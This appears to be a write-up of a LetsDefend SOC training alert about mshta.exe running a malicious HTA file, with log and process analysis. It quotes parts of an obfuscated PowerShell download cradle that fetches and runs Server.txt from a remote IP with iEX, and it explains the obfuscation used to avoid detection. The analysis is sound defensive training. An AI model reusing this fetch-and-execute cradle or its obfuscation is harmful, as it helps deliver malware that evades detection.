LetsDefend-SOC-164- Suspicious Mshta Behavior
We have a new alert regarding low reputation hta file executed via mshta.exe.
What is hta file?
HTA stands for HTML Application. It’s a type of file that can contain HTML, CSS, JavaScript, and other web-based code. HTA files are executable, meaning they can run code directly on your system, making them more powerful (and potentially dangerous) than regular HTML files.
What is mshta.exe?
Mshta.exe is a Windows-native binary designed to execute Microsoft HTML Application (HTA) files.
So, to briefly summarize, after some research, we identified that the problem is related to a LOLBAS (Living Off The Land Binaries, Scripts, and Libraries) attack. Essentially, this is a method that exploits legitimate, native Microsoft binaries for malicious purposes.
Now we can move to the Endopoint security section, searching for Roberto’s machine aka 172.16.17.38.
In terminal history, we see some juicy stuff.
The command C:/Windows/System32/mshta.exe C:/Users/roberto/Desktop/Ps1.hta indicates that the mshta.exeutility is being used to execute a file named Ps1.hta located on the desktop of a user named "Roberto." Ps1 is typically the extension that you would find on a PowerShell script.
The methodology exploited is already known if we search online for more information, as you can see below:
The next step is indeed the execution of a malicious and obfuscated powershell:
Function H1: The function H1($i) takes a hexadecimal string $i, converts each pair of characters into their corresponding ASCII characters, and combines them into a readable string $r.
Creating a WebClient Object: $H2 = (new-object ('{1}{0}{2}' -f'WebCL','net.','ient')); creates a System.Net.WebClient object by piecing together the word "WebClient" in an obfuscated way. The System.Net.WebClient class is used to download data from the web, and the obfuscation is employed to avoid detection.
Hexadecimal Strings:
$H3 = H1 '446f776E';converts'446f776E'to'Down'.$H4 = H1 '6C6f';converts'6C6f'to'lo'.$H5 = H1 '616473747269';converts'616473747269'to'adstri'.$H6 = H1 '6E67';converts'6E67'to'ng'.
These are combined ($H7 = $H3+$H4+$H5+$H6) to form 'DownloadString'.
Downloading and Executing Remote Script:
$H8 = $H2.$H7('http://193.142.58.23/Server.txt');downloads content from the URL into$H8using theDownloadStringmethod.iEX(invoke expression)$H8executes the downloaded content, which is PowerShell code.
Now we have a clearer idea of what’s going on and we can further proceed our analysis.
On VirusTotal we can already see that the IP 193.142.58.23 is flagged as malicious.
We can move also to analyze the logs.
The log entry shows that at 10:29 AM on March 5, 2022, a device with the IP address 172.16.17.38 on port 42611 attempted to make an HTTP request to 193.142.58.23 on port 80. The requested URL was http://193.142.58.23/Server.txt.
This log entry indicates an outbound connection attempt from a local device to a remote server, likely trying to download or interact with the file Server.txt.
If we analyze the processes we can also see that Mshta is spawning PowerShell, as child processes. As such, looking for mshta.exe launching powershell.exe could serve as a high-fidelity detection analytic for a specific behavior.
Conclusion: This alert is a true positive. The attacker exploited a LOLBAS to execute malicious code.
